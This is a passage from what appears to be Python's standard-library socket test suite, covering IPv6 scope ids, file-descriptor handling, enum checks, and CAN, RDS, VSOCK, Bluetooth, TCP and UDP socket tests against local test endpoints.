((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AF_INET')
self.assertEqual(str(s.type), 'SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX") and not (sys.platform == 'OpenVMS'):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has invalid socket from fileno implementation')
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has invalid socket from fileno implementation')
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
def test_addressfamily_enum(self):
import _socket, enum
CheckedAddressFamily = enum._old_convert_(
enum.IntEnum, 'AddressFamily', 'socket',
lambda C: C.isupper() and C.startswith('AF_'),
source=_socket,
)
enum._test_simple_enum(CheckedAddressFamily, socket.AddressFamily)
def test_socketkind_enum(self):
import _socket, enum
CheckedSocketKind = enum._old_convert_(
enum.IntEnum, 'SocketKind', 'socket',
lambda C: C.isupper() and C.startswith('SOCK_'),
source=_socket,
)
enum._test_simple_enum(CheckedSocketKind, socket.SocketKind)
def test_msgflag_enum(self):
import _socket, enum
CheckedMsgFlag = enum._old_convert_(
enum.IntFlag, 'MsgFlag', 'socket',
lambda C: C.isupper() and C.startswith('MSG_'),
source=_socket,
)
enum._test_simple_enum(CheckedMsgFlag, socket.MsgFlag)
def test_addressinfo_enum(self):
import _socket, enum
CheckedAddressInfo = enum._old_convert_(
enum.IntFlag, 'AddressInfo', 'socket',
lambda C: C.isupper() and C.startswith('AI_'),
source=_socket)
enum._test_simple_enum(CheckedAddressInfo, socket.AddressInfo)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
